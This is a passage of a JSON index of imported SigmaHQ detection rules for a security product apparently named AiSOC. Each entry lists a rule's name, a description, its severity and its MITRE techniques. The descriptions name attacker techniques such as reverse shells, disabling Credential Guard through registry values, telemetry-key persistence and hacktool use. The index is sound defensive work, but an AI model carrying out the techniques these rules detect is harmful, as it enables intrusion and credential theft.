"rules/windows/process_creation/proc_creation_win_sysinternals_psexec_execution.yml" } }, { "id": "sigmahq-sigma-731231b9-0b5d-4219-94dd-abb6959aa7ea", "type": "detection", "name": "Suspicious Rundll32 Activity Invoking Sys File", "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rundll32-activity-invoking-sys-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_sys.yml" } }, { "id": "sigmahq-sigma-734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", "type": "detection", "name": "Remote PowerShell Session Host Process (WinRM)", "description": "Detects remote PowerShell sessions by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-powershell-session-host-process-winrm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml" } }, { "id": "sigmahq-sigma-736ffa74-5f6f-44ca-94ef-1c0df4f51d2a", "type": "detection", "name": "HackTool - CrackMapExec File Indicators", "description": "Detects file creation events with filename patterns used by CrackMapExec.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-crackmapexec-file-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "736ffa74-5f6f-44ca-94ef-1c0df4f51d2a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_crackmapexec_indicators.yml" } }, { "id": "sigmahq-sigma-737e618a-a410-49b5-bec3-9e55ff7fbc15", "type": "detection", "name": "Suspicious Calculator Usage", "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/suspicious-calculator-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_calc_uncommon_exec.yml" } }, { "id": "sigmahq-sigma-738d9bcf-6999-4fdb-b4ac-3033037db8ab", "type": "detection", "name": "Suspicious Reverse Shell Command Line", "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-reverse-shell-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_shell_susp_rev_shells.yml" } }, { "id": "sigmahq-sigma-73921b9c-cafd-4446-b0c6-fdb0ace42bc0", "type": "detection", "name": "Windows Credential Guard Disabled - Registry", "description": "Detects attempts to disable Windows Credential Guard by setting registry values to 0. 
Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them.\nAdversaries may disable Credential Guard to gain access to sensitive credentials stored in the system, such as NTLM hashes and Kerberos tickets, which can be used for lateral movement and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-credential-guard-disabled-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "73921b9c-cafd-4446-b0c6-fdb0ace42bc0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_credential_guard_disabled.yml" } }, { "id": "sigmahq-sigma-73a883d0-0348-4be4-a8d8-51031c2564f8", "type": "detection", "name": "Potential Registry Persistence Attempt Via Windows Telemetry", "description": "Detects potential persistence behavior using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, 
"source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-registry-persistence-attempt-via-windows-telemetry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" } }, { "id": "sigmahq-sigma-73bba97f-a82d-42ce-b315-9182e76c57b1", "type": "detection", "name": "Imports Registry Key From a File", "description": "Detects the import of the specified file to the registry with regedit.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/imports-registry-key-from-a-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "73bba97f-a82d-42ce-b315-9182e76c57b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" } }, { "id": "sigmahq-sigma-73e67340-0d25-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 
"mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-clip-launcher-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "73e67340-0d25-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml" } }, { "id": "sigmahq-sigma-74176142-4684-4d8a-8b0a-713257e7df8e", "type": "detection", "name": "Potential Active Directory Enumeration Using AD Module - PsModule", "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dll\" DLL, which is often used by attackers to perform AD enumeration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-active-directory-enumeration-using-ad-module-psmodule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74176142-4684-4d8a-8b0a-713257e7df8e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml" } }, { "id": "sigmahq-sigma-74298991-9fc4-460e-a92e-511aa60baec1", "type": "detection", "name": 
"Added Owner To Application", "description": "Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/added-owner-to-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74298991-9fc4-460e-a92e-511aa60baec1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_owner_added.yml" } }, { "id": "sigmahq-sigma-74403157-20f5-415d-89a7-c505779585cf", "type": "detection", "name": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. 
Which is fairly uncommon and could indicate potential suspicious activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/convertto-securestring-cmdlet-usage-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74403157-20f5-415d-89a7-c505779585cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" } }, { "id": "sigmahq-sigma-744a188b-0415-4792-896f-11ddb0588dbc", "type": "detection", "name": "Potential Process Injection Via Msra.EXE", "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. 
It has been a target used by many threat actors and used for discovery and persistence tactics", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-process-injection-via-msra-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "744a188b-0415-4792-896f-11ddb0588dbc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" } }, { "id": "sigmahq-sigma-746c86fb-ccda-4816-8997-01386263acc4", "type": "detection", "name": "Container Residence Discovery Via Proc Virtual FS", "description": "Detects potential container discovery via listing of certain kernel features in the \"/proc\" virtual filesystem", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/container-residence-discovery-via-proc-virtual-fs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "746c86fb-ccda-4816-8997-01386263acc4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml" } }, { "id": "sigmahq-sigma-749c9f5e-b353-4b90-a9c1-05243357ca4b", "type": "detection", "name": "Potential Privilege Escalation via Local Kerberos Relay over LDAP", "description": "Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account.\nThis may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-privilege-escalation-via-local-kerberos-relay-over-ldap.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_susp_privesc_kerberos_relay_over_ldap.yml" } }, { "id": "sigmahq-sigma-74a12f18-505c-4114-8d0b-8448dd5485c6", "type": "detection", "name": "PUA - Nimgrab Execution", "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": 
"sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nimgrab-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nimgrab.yml" } }, { "id": "sigmahq-sigma-74a2b202-73e0-4693-9a3a-9d36146d0775", "type": "detection", "name": "Remote Access Tool - MeshAgent Command Execution via MeshCentral", "description": "Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.\nMeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-meshagent-command-execution-via-meshcentral.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74a2b202-73e0-4693-9a3a-9d36146d0775", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_meshagent_exec.yml" } }, { "id": "sigmahq-sigma-74a2b37d-fea4-41e0-9ac7-c9fbcf1f60cc", "type": 
"detection", "name": "WinRAR Creating Files in Startup Locations", "description": "Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder.\nThis kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winrar-creating-files-in-startup-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74a2b37d-fea4-41e0-9ac7-c9fbcf1f60cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_winrar_file_creation_in_startup_folder.yml" } }, { "id": "sigmahq-sigma-74babdd6-a758-4549-9632-26535279e654", "type": "detection", "name": "Suspicious Executable File Creation", "description": "Detect creation of suspicious executable file names.\nSome strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-executable-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74babdd6-a758-4549-9632-26535279e654", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" } }, { "id": "sigmahq-sigma-74c01ace-0152-4094-8ae2-6fd776dd43e5", "type": "detection", "name": "File or Folder Permissions Change", "description": "Detects file and folder permission changes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-or-folder-permissions-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "74c01ace-0152-4094-8ae2-6fd776dd43e5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_file_or_folder_permissions.yml" } }, { "id": "sigmahq-sigma-75180c5f-4ea1-461a-a4f6-6e4700c065d4", "type": "detection", "name": "Windows Recall Feature Enabled - Registry", "description": "Detects the enabling of the Windows Recall feature via registry manipulation. 
Windows Recall can be enabled by setting the value of \"DisableAIDataAnalysis\" to \"0\".\nAdversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\nThis rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-recall-feature-enabled-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75180c5f-4ea1-461a-a4f6-6e4700c065d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_enable_windows_recall.yml" } }, { "id": "sigmahq-sigma-7530b96f-ad8e-431d-a04d-ac85cc461fdc", "type": "detection", "name": "Custom File Open Handler Executes PowerShell", "description": "Detects the abuse of custom file open handler, executing powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/custom-file-open-handler-executes-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" } }, { "id": "sigmahq-sigma-7530cd3d-7671-43e3-b209-976966f6ea48", "type": "detection", "name": "Renamed CURL.EXE Execution", "description": "Detects the execution of a renamed \"CURL.exe\" binary based on the PE metadata fields", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-curl-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7530cd3d-7671-43e3-b209-976966f6ea48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_curl.yml" } }, { "id": "sigmahq-sigma-754ed792-634f-40ae-b3bc-e0448d33f695", "type": "detection", "name": "Suspicious PowerShell Parent Process", "description": "Detects suspicious or uncommon parent processes of PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"754ed792-634f-40ae-b3bc-e0448d33f695", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_susp_parent_process.yml" } }, { "id": "sigmahq-sigma-758ff488-18d5-4cbe-8ec4-02b6285a434f", "type": "detection", "name": "Remote Access Tool - NetSupport Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-netsupport-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport.yml" } }, { "id": "sigmahq-sigma-7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "type": "detection", "name": "Important Scheduled Task Deleted/Disabled", "description": 
"Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/important-scheduled-task-deleted-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml" } }, { "id": "sigmahq-sigma-759d0d51-bc99-4b5e-9add-8f5b2c8e7512", "type": "detection", "name": "Creation Of An User Account", "description": "Detects the creation of a new user account. 
Such accounts may be used for persistence without requiring persistent remote access tools to be deployed on the system.
} }, { "id": "sigmahq-sigma-75bfe6e6-cd8e-429e-91d3-03921e1d7962", "type": "detection", "name": "Remote Access Tool - ScreenConnect Installation Execution", "description": "Detects ScreenConnect program starts that establish a remote access to a system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-installation-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml" } }, { "id": "sigmahq-sigma-75c505b1-711d-4f68-a357-8c3fe37dbf2d", "type": "detection", "name": "HackTool - SILENTTRINITY Stager DLL Load", "description": "Detects SILENTTRINITY stager dll loading activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-silenttrinity-stager-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_hktl_silenttrinity_stager.yml" } }, { "id": "sigmahq-sigma-75d0a94e-6252-448d-a7be-d953dff527bb", "type": "detection", "name": "Remote XSL Execution Via Msxsl.EXE", "description": "Detects the execution of the \"msxsl\" binary with an \"http\" keyword in the command line. This might indicate a potential remote execution of XSL files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1220" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-xsl-execution-via-msxsl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75d0a94e-6252-448d-a7be-d953dff527bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msxsl_remote_execution.yml" } }, { "id": "sigmahq-sigma-75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "type": "detection", "name": "Office Application Initiated Network Connection To Non-Local IP", "description": "Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses.\nThis rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.\nThis rule will require an initial baseline and tuning that is specific to your organization.", 